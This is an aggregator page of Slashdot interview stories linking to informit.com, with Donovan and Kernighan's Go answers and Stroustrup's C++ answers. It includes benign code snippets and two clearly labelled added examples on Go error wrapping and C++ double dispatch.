Domain: informit.com
Stories and comments across the archive that link to informit.com.
Stories · 55
-
Interviews: Ask 'Ubuntu Unleashed' Author Matthew Helmke
Matthew Helmke (personal blog) is the author of the newly published 11th edition of Ubuntu Unleashed (published by Pearson); this updated edition of the book will cover the OS through Ubuntu's 15.10 and (forthcoming) 16.04 releases. Helmke is also a former Ubuntu Forum administrator, a musician, an entrepreneur, and a long-time Slashdot reader who now leads a "nice quiet life in Iowa." Ask Matthew about what it's like to be a Linux book author and community leader, and his thoughts on Canonical, the goods and bads of modern Linux distributions, and the future of Ubuntu -- especially relevant with the upcoming release of the first Ubuntu-based tablet. (Remember, Matthew isn't responsible for gripes you may have with either Ubuntu or Canonical, but he might have some good solutions to particular problems.) Ask as many questions as you'd like; we just ask that you keep them on-topic, and please stick to one question per post.
Who would you like to see interviewed on Slashdot? Drop us a line at feedback@slashdot.org. -
Interviews: Alan Donovan and Brian Kernighan Answer Your Questions (slashdot.org)
A few weeks ago you had the chance to ask Alan Donovan and Brian Kernighan about programming and their upcoming book, The Go Programming Language (available as an eBook Friday the 20th). Below you'll find their answers to your questions.
Donovan/Kernighan: Thanks to all the Slashdot readers who posed such thoughtful and provoking questions; we’re sorry that space limitations prevent us from answering more of them. Neither of us is part of the core Go team, so we can’t give authoritative answers for some of the questions that deal with future plans for the language or tools.
OpenGL and LockOSThread
by Anonymous Coward
Hi, I stopped using Go when I saw the hacky stuff I need to do to get libraries like OpenGL to behave correctly. Are there any plans to fix this?
Donovan: The crux of the problem is that many C libraries such as OpenGL implicitly use the identity of the calling thread to store context information. In some cases, this is because the API was designed before multithreading was the norm, when global variables could be safely used to store context information. In other cases, this design is merely a matter of convenience, since it saves passing an extra parameter to every call.
The designers of Go rejected thread-local storage (TLS) because of its tendency to cause "action at a distance": it makes programs slightly shorter but much harder to read. (See p.282 of our book.) Since the lack of TLS in Go is considered a feature, there are no plans to "fix" it, but it may be possible to make TLS-heavy C libraries work better with Go. My colleague David Crawshaw just gave a talk at DotGo 2015 in Paris about this very issue as it concerns OpenGL.
Why was package versioning left out?
by genocitizen
Why was package versioning left out? And are you guys still fond of this decision? As I use Go more and more I see this to be the weak spot; software has been around for many decades, and we all know that it is continuous evolution. Go's import system does not allow specifying or hinting a version, nor does the `go get` command (although it supports major VCSes), and that's how hacks like gopkg.in have been conceived. And it's not like package managers for other languages haven't already solved the problem in a more or less elegant way...
Donovan: Go is designed for large programs, and versioning is notoriously hard in that context. About ten years ago, there was an experiment to introduce versioning into Google's build system (which was designed by Rob Pike and others). It failed because of the "diamond dependency" problem, which I'm sure many of you have heard of---it's the classic problem of version numbering. Consider four packages A, B, C, D, where A depends on B and C, and B and C both depend on D. This is a diamond dependency. If the author of B decides that only version 1 of D will do, and the author of C requires at least version 2 of D, you have an impossible set of constraints. If you're lucky, you might be able to build A with both the old and the new versions of D, but in general this doesn't work. Since that experiment, Google hasn't touched automated versioning again. The way we do versioning is simple but manual: we treat each version of a package as a separate entity with a distinct name (for example, "D1", "D2"), and work hard to limit the number of versions of each package---ideally to one. That’s why versioning hasn’t been a priority for us at Google. However, this August, the prolific Dave Cheney proposed a scheme for Go package version numbering, so perhaps we’ll see development of this idea in the near future.
Error Handling in Go
by JPyObjC Dude
Go language differs from many other languages in how it handles Errors. Can you summarize the benefits and drawbacks to the Go language error handling approach when compared to Java for large scale applications.
Kernighan: In general, Go strongly encourages being explicit about errors. The standard library functions almost all return an error status along with the function value and your code must do something with that error status; you can’t just ignore errors. In this respect, Go is similar to Java, where you have to either catch or throw errors; you can't just do nothing. This is a nuisance in small one-off programs, but it's a life-saver in larger ones. So both languages are doing "the right thing".
Where they differ is primarily in the use of exceptions. Go does not have an exception mechanism, so there's no direct way to handle all the errors in a single block as there is with Java's try/catch, though the defer statement can help to consolidate error handling. This means that Java code might be somewhat more compact (in this respect only!), but perhaps at the price of not providing as much precise information about what went wrong.
Our Go book spends quite a bit of time on the topic of error handling, and in most of the examples we've tried to show how to deal with errors properly rather than ignoring them, even though this can make the example programs a bit longer.
Donovan: I’ve written a fair amount of Java code and, in my experience, good error handling is about equally hard in both languages. However, Go reduces the syntactic cost of augmenting an error message as you propagate it, because you have to write more or less the same code whether or not you augment the error with new information. Java, by contrast, makes it so tempting to avoid writing try/catch/throw blocks that, too often, programmers propagate exceptions without thinking. It’s interesting that you can never divine such subtle pragmatic differences between languages merely from reading their specs.
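The explicit, wrap-as-you-propagate error handling both authors describe, shown as an added Go example that is not code from the book or from the interview. Everything here is constructed for illustration: the parseQuota and loadQuotas functions, the ErrOutOfRange sentinel and the config entries are assumptions, not anything from the page. The mechanics are standard library only: fmt.Errorf with the %w verb attaches context while keeping the underlying cause reachable through errors.Is, and the deferred closure in loadQuotas is the defer-based consolidation Kernighan mentions, prefixing every error path with the same context once instead of at each return.

```go
package main

import (
	"errors"
	"fmt"
	"strconv"
)

// ErrOutOfRange is a sentinel error (assumed for this example) that callers
// can test for with errors.Is even after the error has been wrapped twice.
var ErrOutOfRange = errors.New("quota out of range")

// entry is one constructed config line: a user name and its quota as text.
type entry struct {
	name string
	raw  string
}

// parseQuota converts a textual quota to an int in [0, 1<<20]. Every failure
// is returned rather than ignored, and wrapped with %w so the caller can still
// ask whether the cause was, say, strconv.ErrSyntax.
func parseQuota(s string) (int, error) {
	n, err := strconv.Atoi(s)
	if err != nil {
		return 0, fmt.Errorf("parse quota %q: %w", s, err)
	}
	if n < 0 || n > 1<<20 {
		return 0, fmt.Errorf("quota %d: %w", n, ErrOutOfRange)
	}
	return n, nil
}

// loadQuotas parses every entry in order. The deferred closure runs on every
// return path and augments a non-nil named error with the function's context,
// so each early return only has to add what is specific to that failure.
func loadQuotas(cfg []entry) (quotas map[string]int, err error) {
	defer func() {
		if err != nil {
			err = fmt.Errorf("loadQuotas: %w", err)
		}
	}()
	quotas = make(map[string]int, len(cfg))
	for _, e := range cfg {
		n, perr := parseQuota(e.raw)
		if perr != nil {
			return nil, fmt.Errorf("user %s: %w", e.name, perr)
		}
		quotas[e.name] = n
	}
	return quotas, nil
}

func main() {
	good := []entry{{"alice", "10"}, {"bob", "20"}}
	quotas, err := loadQuotas(good)
	fmt.Println(quotas, err)

	bad := []entry{{"alice", "10"}, {"mallory", "4x2"}}
	_, err = loadQuotas(bad)
	fmt.Println(err)
	// The cause survives two layers of wrapping.
	fmt.Println("syntax error:", errors.Is(err, strconv.ErrSyntax))
}
```

The point of the named return plus defer is that adding context costs one line per function rather than one per return, which is what makes it cheap enough that Go code tends to carry the full chain ("loadQuotas: user mallory: parse quota \"4x2\": ...") instead of a bare cause.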
Usage
by Behrooz Amoozad
For what scenarios and projects do You recommend it and for which you recommend against using Go?
Kernighan: Go is a very good general purpose language, and we would have no hesitation about using it for any new task. It seems especially well-suited for programs that involve networking or other concurrent tasks; goroutines are very convenient and efficient, and there is also good support for more traditional shared-memory approaches. Empirically, people who write new networking code tend to like Go. I personally would use it for anything where in the past I might have used C or Java or C++.
Go has also gotten some traction as a scripting language, a potential replacement for large Python scripts. This may seem a bit surprising, since scripting languages are very convenient for cobbling something together in a hurry. The problems come later, when the cobbled-together code starts to crash with type errors or other faults that could have been detected much earlier with a statically typed language. Go won't replace Awk for one-liners, nor is it likely to replace Python or Perl or Ruby for 10- or even 100-line programs, but after a while, the combination of type safety and efficiency is worth the somewhat higher up-front cost.
Why should I use Go?
by aaaaaaargh!
For someone like me who likes garbage collection, multiple dispatch, and extreme abstraction capabilities in high level languages like Common Lisp, and safety, compile-time error detection, readability, and speed in low level languages like Ada or Haskell, what are the benefits of using Go in comparison to these two different types of languages? What new useful features does Go bring?
Kernighan: Ada and (especially) Haskell don't seem like low-level languages and Haskell is inscrutable to newcomers, but those are quibbles. Go has everything you mention in both of your lists of desirable attributes (depending perhaps on what you mean by "extreme abstraction"), but it also provides concurrency in a convenient and efficient form; that's a big win for some kinds of applications.
Donovan: Go seems very plain when compared with languages like Common Lisp, C++, Java, or Python. It has no macros, no templates, no classloaders, no metaclasses. Features such as these are often the first things I, being a PL geek, rush to play with when writing toy programs in a new language, but they are not usually the things that matter the most when programming in the large. I can recall without fondness many days spent debugging overly clever uses of the C++ STL or non-hygienic Lisp macros or the Python __call__ method. The design of Go recognizes that simplicity, homogeneity, and familiarity of a large code base are more valuable to the team as a whole than the benefits to each individual of using their favorite (obscure) language features for each task.
Go’s potential
by Qbertino
What serious long-term real-world potential do you see for Go? How do you see the potential of Go replacing existing open source webstacks such as Apache and PHP, Python or Ruby? Was Go built with a technology update of existing approaches in mind? How feasible is it in your opinion to try and replace the existing complex stacks with pure Go runtimes?
Kernighan: The reason it took God only six days to create the universe is that he didn't have to deal with the embedded base. Realistically, no programming language is likely to completely replace major existing code bases; it's just too much work. Go is often a good choice for new projects or where one is planning to rewrite an existing system anyway, and it can provide a good interface to existing code through foreign function interfaces, particularly to C libraries. But wholesale replacements seem unlikely.
Donovan: I agree with Brian that Go isn’t likely to eliminate any other language or library, but that is not its goal. Go provides an attractive alternative. A good part of Go’s popularity comes from the ease with which you can build useful web servers and other distributed systems using little more than the components of the standard library. The library was produced recently, and thus with the benefit of hindsight, by systems experts, and it often makes third-party servers like Apache or frameworks like Rails unnecessary for the first steps---although of course similar frameworks do exist for Go too.
Official Go IDE?
by Qbertino
Is there an official cross-platform Go IDE in the works? Experience shows that adoption is accelerated by offering a solid toolkit that is easy to pick up and get started with - such as the formidable Android Studio IDE Google offers to developers. Are there any plans similar to this for Go? I would like to see it take the place of C++ in the development of performant end-user applications with GUIs - are there any officially sanctioned projects that aim to provide a serious GUI toolkit and stack based on Go?
Donovan: We agree that good IDE support is important for attracting new users to Go, though my colleagues and I came to this realization rather slowly as, perhaps unsurprisingly, most of us use very traditional editors like Vim, Emacs, SublimeText, and even Acme, which are not what most people think of as IDEs. This year, JetBrains have created a team to develop a Go plugin for IntelliJ so that IntelliJ IDEA users can build, test, debug, and refactor programs written in Go as easily as in any other language.
As for cross-platform GUI toolkits, there’s no canonical solution yet, though there have been some interesting experiments such as GXUI and Shiny.
Should Go replace Java?
by Martinjnh
Should Go replace Java as development platform/language for android?
Donovan: The Go team at Google is working hard to make it possible to use Go to write mobile applications on Android and iOS; see Hana Kim's GopherCon 2015 talk, for example. But for now this is just an experiment and, as Brian wrote above, it's not Go's goal to replace major existing code bases.
Safe Performance
by snadrus
Reimplementing the Gnu+Linux toolchain in GoLang could provide safety that decades of eyes on C could not (thinking about the recent BASH bugs & OpenSSL overruns). Even a small portion would add security to Android. Performance is close & 1.5's library loading should keep executables light. Is there interest in rebuilding Linux's base userland?
Donovan: Go is a good fit for these kinds of tools because the language has good runtime safety and a straightforward system call interface, and it compiles to static executables that start quickly and run efficiently. Portability might be a concern: while Go programs themselves are highly portable, Go's runtime currently targets only a handful of major architectures, far fewer than gcc and glibc support. I'm not aware of any rebuilding projects.
tEoPS
by M. D. Nahas
There many books on "how to program" but few on "how to program well". Brian, your book "The Elements of Programming Style" is a wonderful and a classic, but my students have a hard time reading the examples (Fortran 66 and PL/I). Is there any hope for an update? Is there any similar modern-language book that you recommend?
Michael Nahas (son of Joe Nahas)
P.S. I totally stole as much as I could from you when writing my tutorial for the language Coq. Sorry/Thanks!
Kernighan: The languages that Bill Plauger and I used in "The Elements of Programming Style" are either long gone (PL/1) or very much evolved (Fortran), so the code is indeed hard to read today, though most of the rules of good style are still valid. Bill and I once started a version in C but didn't get very far. One problem was that the original book relied almost exclusively on code fragments from textbooks. Modern textbooks are far better than they were 40 years ago; most code is syntactically correct and mostly works. So it was hard for us to find textbook examples to illustrate our rules. Another problem is that real programs are a lot bigger and more complicated than they were, and it's hard to find excerpts that would work in a book. So an update of EOPS isn't likely, much as it would be nice to have one.
As to other books, Josh Bloch and Scott Meyers have written excellent books on how to write good Java and C++ respectively. More broadly, I have always liked Steve McConnell's "Code Complete", and I take a fresh look at Fred Brooks's classic "The Mythical Man Month" every few years. There are plenty of other books about how to program well in various languages and environments; it's well worth reading some of them to see how other authors approach the topic.
C's current place in the world
by MountainLogic
As the legend has it, C was created to support operating system development. As time has gone by C++ has slipped into OS development on larger platforms. It seems that much of the current core use of mother C is centering on embedded processors (all the way down to 8 bit micros with 256 bytes of RAM) and drivers in larger systems. For current use what design choices in C do you see as wise and what would you change given the current usage of C. (P.S. Thank you for co-authoring the most wonderful, perfect, clear and concise technology document ever.)
Kernighan: Bear in mind that C is Dennis Ritchie's work; I can only claim to have written a book with him. Dennis was a great writer as well as a great programmer and language designer, and the book was very much a joint effort.
That said, C is indeed still popular for embedded systems and drivers, where efficiency and the ability to get right down to the hardware matters. I think that changing C today would be counter-productive; one of C's strengths is that it is quite stable. Indeed, I suspect (though without having data to prove it) that except for minor features like // comments most programmers use C as it was after the 1988 ISO standard; the C99 and C11 standards did not change much of programming practice.
Motivation for writing the book
by jameshwang
I was curious out of all the Golang books that currently exists, how does this book, "The Go Programming Language," differ from the rest and fit into the landscape of Golang? I've read some of the other books like "Go Programming Blueprints" and "Go in Action." Specifically with "Go in Action," the table of contents seems similar to your book.
I guess what was your motivation to write this book and how will it be different from all the rest? Brian, are you hoping this book becomes what "The C Programming Language" became but for Golang?
Kernighan: As it says in Ecclesiastes 12:12, "of making many books there is no end", which suggests that your question about whether another book is needed is an old one.
When one writes a book, there is always the belief or at least hope that one can do it "better" than others, not in any negative sense but just that new organization, examples, explanations, and writing will all combine in a way that readers will find helpful. Certainly that has been what Alan and I have tried to achieve with "The Go Programming Language". It would of course be wonderful if the Go book was as helpful to programmers as the C book seems to have been.
I have looked at only a couple of the many Go books that have already been written (and not the ones you mention), and in fact Alan and I quite consciously stopped even looking at titles once we started thinking about our own book, since we didn't want to inadvertently borrow from other authors.
Donovan: For me, one motivation was to write the book I wished I had been able to read when I started learning Go---a comprehensive book that covers not just the language and its library, but one that motivates the design choices, explores advanced features, flags the pitfalls, and conveys the style and aesthetics of the language.
Although comparisons with K&R are inevitable (and flattering), I don't think any technical book can ever be as influential as that one. It was not just a tutorial for the most important language of a (pre-Internet) generation, but also its reference manual and de facto spec. Today, of course, you can browse The Go Tour, Godoc, and The Go Language Specification from your cellphone. Libraries are larger and tooling is more important. A modern book must have a different emphasis. We've tried to show how all the parts fit together. -
Interviews: Ask Alan Donovan and Brian Kernighan About Programming and Go
Alan Donovan is a member of Google’s Go team in New York and holds computer science degrees from Cambridge and MIT. Since 2005, he has worked at Google on infrastructure projects and was the co-designer of its proprietary build system, Blaze. Brian Kernighan is a professor in the Computer Science Department at Princeton University. He was a member of technical staff in the Computing Science Research Center at Bell Labs, where he worked on languages and tools for Unix. He is the co-author of several books, including The C Programming Language, and The Practice of Programming. Recently, the pair have co-authored a soon to be released book titled The Go Programming Language. Alan and Brian have agreed to give us some of their time to answer any questions you may have about the upcoming book, Go, and programming in general. Ask as many questions as you'd like, but please keep them to one per post. -
Interviews: Bjarne Stroustrup Answers Your Questions
Last week you had a chance to ask Bjarne Stroustrup about programming and C++. Below you'll find his answers to those questions. If you didn't get a chance to ask him a question, or want to clarify something he said, don't forget he's doing a live Google + Q & A today at 12:30pm Eastern.
Cutting features and old syntax?
by Katatsumuri
Sometimes well-established languages keep adding new features and syntactic constructs until most developers are not even aware of all the possibilities and use maybe 20% in their usual daily work. The old features and syntax are kept around for compatibility and to keep the old guard content, even if cutting them would lead to faster compilation, more elegant language and less confusion.
This may be part of the reason for the constant introduction of new trendy languages with radically simplified syntax and libraries... Which then follow the same pattern. Few languages are introducing new paradigms, many are trying to be a "better" C++, Java, LISP, JavaScript or Perl.
Do you think this cycle is inevitable, or could it be a good idea to sometimes clean up the syntax and the obscure features in new specification versions, to keep the established languages more competitive?
Bjarne: Languages grow. The alternative is stagnation because there is nothing the maintainer of a large code base hates more than working code breaking – even if that code is full of avoidable errors. We dream of cleaning up the mess, but somehow there is never the month or couple of years needed. I dream of “cleaning up the mess” as much as the next guy, and I know the mess better than most. It is hard to evolve a language compatibly, but IMO it is harder still to make a major – worthwhile – breaking change. Stagnation is not something I can accept – we can and must do better (even if that takes compromises).
You probably didn’t mean that, but “syntax” isn’t the most important aspect of software development. People will suffer atrocious syntax to get valuable functionality (C++ template meta-programming is an example). Also, developers and maintainers of production code eventually tire of cute (often very terse) syntax. “Syntax” is the user-interface for programmers, rather than the system itself. What we hope for is a minimal and logical interface to a useful semantics.
For any reasonable definition of “paradigm” (a word I use only very rarely), there are very few new paradigms coming along, so people have to be happy with incremental changes. Slow steady progress can – over time – add up to major improvements. However, few people take the longer (decades) view.
On the evolution of C++
by stox
How do you feel about the evolution of C++ since it was first implemented with Cfront? What began as a pretty straightforward language has been expanded to significant complexity. Has this evolution been positive, or has it been an attempt to make the language apply to too many possible applications?
Bjarne: C++14 is a far better tool for software development than “C with Classes” was, far more powerful in the key areas that “C with Classes” was invented to deal with. It is more expressive, better checked, generates faster code, and is applicable in areas that “C with Classes” could not touch. The cost has been complexity. My aim has been constant: a direct mapping to hardware plus zero-overhead abstraction. C++ is not the best language for everyone and everything, but then I never promised that it would be. However, C++ is an excellent tool for attacking a vast variety of system design and implementation problems.
I hope that the tide has turned so that C++ is becoming more “novice friendly.” C++11 and C++14 are steps on that route: auto, range-for, lambdas, uniform initialization, concepts, etc., all make it easier to express simple things simply (without loss of performance). For example, a friend sent me this C++99 code (simplified, of course, but from a large code base):
// old code:
// (the element type inside the angle brackets was lost in extraction; Elem is a stand-in)
std::vector<Elem>::const_iterator cit = v.cbegin();
for ( ; cit != v.cend(); ++cit) {
    if (LookForPattern(*cit))
        return true;
}
return false;
He deemed this to be somewhat messy and in need of improvement. For starters, we can eliminate the long type name by letting auto deduce it:
// first step:
for (auto cit = v.cbegin(); cit != v.cend(); ++cit) {
    if (LookForPattern(*cit))
        return true;
}
return false;
auto is the oldest C++11 feature. I implemented it in 1983/84, but was forced to remove it for C compatibility reasons. It provides the ability to deduce a type from an initializer; after all, the compiler knows the type of v.cbegin() so why should I need to repeat it? Note how the scope of cit is now limited to its area of use.
We can simplify regular loops using a range-for, so we get:
// second simplification:
for (const auto& x : v) {
    if (LookForPattern(x))
        return true;
}
return false;
There is now no iterator, so it cannot be accidentally or deliberately modified in the loop. Now it is obvious that we should have used a standard-library algorithm:
// good:
return std::find_if(std::cbegin(v), std::cend(v), LookForPattern) != v.cend();
That’s where my friend stopped, observing that it was now also obvious how to use a lambda as the operation in other places. Being a fan of range/container algorithms, I would have said:
// my variant:
return find_if(v, LookForPattern) != v.cend();
This involves having a range version of find_if lying around somewhere. For example:
// range version of std::find_if:
// (the template parameter list was lost in extraction; restored here)
template<typename Cont, typename Pred>
auto find_if(Cont& c, Pred p)
{
    return std::find_if(std::begin(c), std::end(c), p);
}
Next time such an improvement is needed, I think my friend and his colleagues will jump directly to one of the later variants. With a bit of luck, they will even have a tool to help them find candidates for simplification.
Regrets
by Anonymous Coward
What do you regret most in C++ and how would you like to change it?
Bjarne: No regrets! Seriously, a language grows up at a specific time and in a specific environment. To survive that language has to be viable at every stage of its evolution. I’d hate to second guess 1980s vintage Bjarne. He was at least as smart as I am and had a far better grasp of the world at the time. Simply saying, “if I had had a few million dollars for buying market share with ‘free’ libraries or for developing a better definition of templates C++ would have been better” just isn’t intellectually honest.
If I had a time machine, I just might jump back to 1987 and drop a sketch of a design of templates with concepts on Bjarne’s desk. He was working on the template design at the time and knew the problems with template parameter requirements well. Unfortunately, neither he nor anyone else at the time knew how to simultaneously get generality, performance, and well-specified interfaces. Given a bit of help from the time traveler, he might very well have gotten the point. Then, in 1990, we would have been able to write:
// (the angle-bracket parts were stripped in extraction; restored here)
void sort(Sortable& c);   // sort random-access sequences of elements with <
void user(vector<string>& vs, vector<complex<double>>& vc)
{
    sort(vs);   // OK
    sort(vc);   // error: vc not Sortable; complex does not have <
}
However, I don’t have a time machine, so we had to wait until next year (or now if you use the concepts branch of GCC).
Future of C++ Standard Library
by DaphneDiane
One of the recent concerns raised with C++ compared to other popular languages is the breadth of the standard library. I know that the C++ standard committee was looking at adding a C++ transformed version of Cairo to the standard. And of course there is boost. What else do you see coming to address the perceived API shortcomings?
Bjarne: C++ is a formally standardized language. It is defined by the ISO. Compared to other such languages, C++ has a huge and growing standard library. However, compared to commercially owned languages, such as Java and C#, the ISO C++ standard library is tiny. We – the C++ standards committee – do not have the resources to buy market share. The committee is trying to add useful libraries as fast as it can safely do so. The standard library is most important because it creates a common foundation, but it can never be sufficient for the needs of the huge community.
We somehow have to create a better “exchange” for open-source and other libraries. We will also have to work harder on library interoperability. There are a huge number of C++ libraries “out there,” but they tend not to be designed for interoperability and many producers of libraries have their very own programming styles and specialized assumptions.
To speed up standardization – especially the standardization of libraries – the ISO C++ standards committee has started “study groups” producing “technical specifications.” A technical specification is not a full-blown international standard, but it is a document produced by on the order of 20 people and approved by the full committee. Current library TSs in progress are:
File system
Library foundation (e.g., optional and string_view)
Ranges (for people tired of saying v.begin(),v.end() and much, much more)
Concurrency (threads, etc.)
Parallelism (parallel algorithms, networking, and more)
Numerics (incl. SIMD)
Transactional Memory (has core language parts)
I/O (incl. 2D graphics)
See here for details.
ABI
by gbjbaanb
Do you think that one thing holding C++ back is the lack of a standardized binary interface?
Currently if I want to make a module that can be consumed by others (whether that is others using a different language, or a different C++ compiler, or even just to use a pre-built module without sources) I have to export everything as C and use its (de-facto if nothing else) binary standard.
I think an ABI for C++ would increase its "real world" attractiveness considerably with little, if any, overhead. Do you agree, or are there issues around this that make it a significant challenge (apart from vendor adoption of course).
Bjarne: A C++ ABI would be a huge boon to the C++ community; however, it is not an easy problem to solve technically, and most C++ implementation providers have huge user bases that would howl in outrage if binary compatibility with their previous version was broken.
To solve the technical problem, we would need the ABI to cover basic object layout (easy), class hierarchies (not hard), and abstractions using templates (hard). An ABI that could not handle std::vector, std::map, and similar user-supplied abstractions would be a failure. I do not (in any detail) know how to do that.
To solve the political problem, we would need all vendors on a platform to adopt that ABI (probably impossible except in the longer term) or provide it as an “exchange format” in addition to their traditional ABI.
Which feature would you add to C++?
by jonwil
If you could add one feature to C++ (either the language or the standard library) and have it adopted in the C++ standard and supported by all the compilers etc., what would it be and why?
Bjarne: Ah! Just one feature? You must be kidding, but I’ll say “concepts.” They will change the way people think of generic programming and of programming in general, and we’ll have them next year. They are already shipping in a branch of GCC and will be an ISO C++ TS (Technical Specification) in 2015 (I hope and expect).
People have mentioned more standard libraries and a standard ABI. I’d like to see higher-level concurrency models –the type-safe C++11 threads and locks are still too low level. I’d like to eliminate the need for the visitor pattern workaround; for example, see:
Y. Solodkyy, G. Dos Reis and B. Stroustrup: Open Pattern Matching for C++. ACM GPCE'13.
Y. Solodkyy, G. Dos Reis, and B. Stroustrup: Open and Efficient Type Switch for C++. Proc. OOPSLA'12.
P. Pirkelbauer, Y. Solodkyy, and B. Stroustrup: Open Multi-Methods for C++. ACM GPCE’07.
Remember that an academic paper plus an implementation does not add up to a complete standards proposal, but wouldn’t you like to be able to write:
bool intersect(virtual Shape&, virtual Shape&); // non-member virtual function

void user(Shape& s1, Shape& s2)
{
    if (intersect(s1,s2)) // ...
    // ...
}
Assuming suitable overloads of intersect() to handle Shapes that are Circles, Triangles, etc. The alternative today is a mess of if-statements, some clever special-purpose workaround, or an elaborate visitor setup.
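The following is an added example, not code from the interview or from Stroustrup: it shows the hand-written double dispatch that an open multi-method such as intersect(virtual Shape&, virtual Shape&) would replace. The class names, the axis-aligned rectangle and the intersect_with helper name are assumptions made for the illustration. The first virtual call resolves the dynamic type of the left operand, the second resolves the right one, and every new Shape forces edits to every existing class, which is the "elaborate visitor setup" the answer refers to.

```cpp
// Added example (not from the interview): double dispatch by hand.
#include <algorithm>
#include <iostream>

struct Circle;
struct Rect;

struct Shape {
    virtual ~Shape() {}
    // First dispatch: selects the override for the dynamic type of *this.
    virtual bool intersect(const Shape& other) const = 0;
    // Second dispatch: called on 'other' with the first shape's type now
    // known statically; overload resolution completes the pairing.
    virtual bool intersect_with(const Circle& c) const = 0;
    virtual bool intersect_with(const Rect& r) const = 0;
};

struct Circle : Shape {
    double cx, cy, radius;
    Circle(double x, double y, double r) : cx(x), cy(y), radius(r) {}
    bool intersect(const Shape& other) const override;
    bool intersect_with(const Circle& c) const override;
    bool intersect_with(const Rect& r) const override;
};

struct Rect : Shape {                  // axis-aligned, corners (x0,y0) and (x1,y1)
    double x0, y0, x1, y1;
    Rect(double a, double b, double c, double d) : x0(a), y0(b), x1(c), y1(d) {}
    bool intersect(const Shape& other) const override;
    bool intersect_with(const Circle& c) const override;
    bool intersect_with(const Rect& r) const override;
};

// The three geometric cases; shapes that merely touch count as intersecting.
static bool circle_circle(const Circle& a, const Circle& b)
{
    double dx = a.cx - b.cx, dy = a.cy - b.cy, rr = a.radius + b.radius;
    return dx * dx + dy * dy <= rr * rr;
}

static bool circle_rect(const Circle& c, const Rect& r)
{
    // Closest point of the rectangle to the circle centre, then a distance test.
    double px = std::min(std::max(c.cx, r.x0), r.x1);
    double py = std::min(std::max(c.cy, r.y0), r.y1);
    double dx = c.cx - px, dy = c.cy - py;
    return dx * dx + dy * dy <= c.radius * c.radius;
}

static bool rect_rect(const Rect& a, const Rect& b)
{
    return a.x0 <= b.x1 && b.x0 <= a.x1 && a.y0 <= b.y1 && b.y0 <= a.y1;
}

// First dispatch: *this has a known static type here, so the second call
// picks the matching intersect_with overload and dispatches on 'other'.
bool Circle::intersect(const Shape& other) const { return other.intersect_with(*this); }
bool Rect::intersect(const Shape& other) const   { return other.intersect_with(*this); }

bool Circle::intersect_with(const Circle& c) const { return circle_circle(c, *this); }
bool Circle::intersect_with(const Rect& r) const   { return circle_rect(*this, r); }
bool Rect::intersect_with(const Circle& c) const   { return circle_rect(c, *this); }
bool Rect::intersect_with(const Rect& r) const     { return rect_rect(r, *this); }

// The non-member entry point the interview sketches, built from the above.
bool intersect(const Shape& a, const Shape& b) { return a.intersect(b); }

int main()
{
    Circle c(0, 0, 1);
    Rect r(0.5, -1, 2, 1);
    const Shape& a = c;      // only the base type is visible at the call site
    const Shape& b = r;
    std::cout << "circle/rect: " << intersect(a, b) << '\n';             // 1 (true)
    std::cout << "rect/rect:   " << intersect(b, Rect(2, 2, 3, 3)) << '\n'; // 0 (false)
    return 0;
}
```

Every pair of concrete types needs its own overload and every class needs a forwarding override per sibling, so adding a Triangle touches Shape, Circle and Rect; that maintenance cost is what the proposed language feature removes.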
C++ without the C
by kthreadd
Apple recently introduced a language they call Swift or Objective-C without the C. It is technically a completely different language from Objective-C though. When C++ started out it had the major benefit that it was (mostly) compatible with C which at the time was immensely popular, making it trivial to mix new C++ code with existing C code. Today C is still a popular language but not as widely used as it once was. Assuming that C++ could drop C compatibility, how would you take that opportunity to improve C++?
Bjarne: People tend to underestimate C. Today, we probably don’t need C compatibility (except to keep billions of lines of critical code running), but we do need a direct map to hardware. If we didn’t have C or the C-level subset of C++, we would have to find a different way to do that map. Languages without C’s problems typically rely on C or C++ to do their dirty work for them.
I think we should think more about isolating unsafe code in a program than to eliminate it. Putting the necessary unsafe code into a different language limits our control of it, limits what can be communicated to it, and typically imposes overheads.
That said, when people rail against C, and by implication C++, they usually (and correctly in the case of C and C-style C++) point to two problems: lack of type safety and the lack of abstraction mechanisms. Together, those two problems leave people with lots and lots of low-level code in which bugs can hide (e.g., buffer overflows, invalid pointers, and resource leaks).
C++ attacks these problems by providing alternatives. You can write type-safe code in C++; you can write simple code that doesn’t leak or leave invalid pointers behind; you can do so with zero overhead compared to lower-level alternatives. Consider:
#include <iostream>
#include <string>
#include <vector>
using namespace std;

vector<string> collect(const string& terminator)
{
    vector<string> res;
    for (string s; cin>>s && s!=terminator; )   // read words until the terminator
        res.push_back(s);
    return res;                                  // moved out, not copied
}

void user()
{
    auto ss = collect("end");   // ss is a vector<string>
    // ...
}
I used C++11’s move semantics and auto to simplify that code. Note the absence of memory management code and the absence of leaks. Returning containers by value is simple and efficient in C++11 because the standard library provides move constructors for all containers, such as vector.
The problem is that many people don’t write such simple code and are stuck with the old problems hidden in lots of far more complicated code.
I don’t actually think that there is less C and C++ programming these days. I think that in absolute terms there is more than ever, and not just people working on “legacy code.” People are confused by unscientific estimates of usage and especially by the fact that there is much more software development these days, so that the amount of C and C++ is declining relative to the total. In particular, I think I see significant growth of C++ in its core domains. The number of C++ programmers today is more likely to be 4 or 5 million than the 3 million I estimated ten years ago. But it is hard to count programmers.
Hour of Code
by Orestesx
What is your opinion of the "Hour of Code" as promoted by CSEdWeek? Does it trivialize computer science education?
Bjarne: I guess that anything that popularizes hands-on software development experience is good. On that count, I’m in favor of Lego, programming contests, Raspberry Pi, etc. Too many people think science and (especially) engineering boring.
Do color change and explosive chemistry experiments trivialize chemistry? Do demonstrations of Newton’s cradle and prisms trivialize physics? No! You need to inspire and motivate students in preparation for the necessary hard work. I think Computer Science should be taught as a serious academic discipline – like Physics and Biology – for which years of work is needed for mastery, rather than as a basic skill that must be quickly mastered by all. I think the serious work should start in high school, like it is (or IMO should be) for mathematics, physics, and biology. It is not just child’s play. It could start in university if it wasn’t that students tend not to choose fields of study in university that they have not encountered in high school.
Not everybody can become a good programmer. The world needs a lot of programmers, maybe 20 million, but we don’t need a billion. We need to distinguish between the education of professionals and giving people a bit of computer literacy. People seem confused about this or unwilling to accept that serious preparation is needed for people who build serious software. Our lives and livelihood depend on software. Just think of the amount of computing that goes into delivering your food to your table: agriculture, transport, telecommunications, embedded systems, planning, scheduling, etc. You cannot milk a herd of cows without the help of computers these days! Or at least you cannot if you have to keep records of the cows’ health and production for the obligatory quality control. I would strongly prefer for critical software to be developed and maintained by professionals. I’m less concerned about the quality of your favorite videogame or the advertisements that pop up to annoy me when I try to read the news.
I’m more interested in the engineering part of computer science than the pure science part. Computer science is among other things a set of science-based practical skills, an engineering discipline.
Personal programming projects
by kthreadd
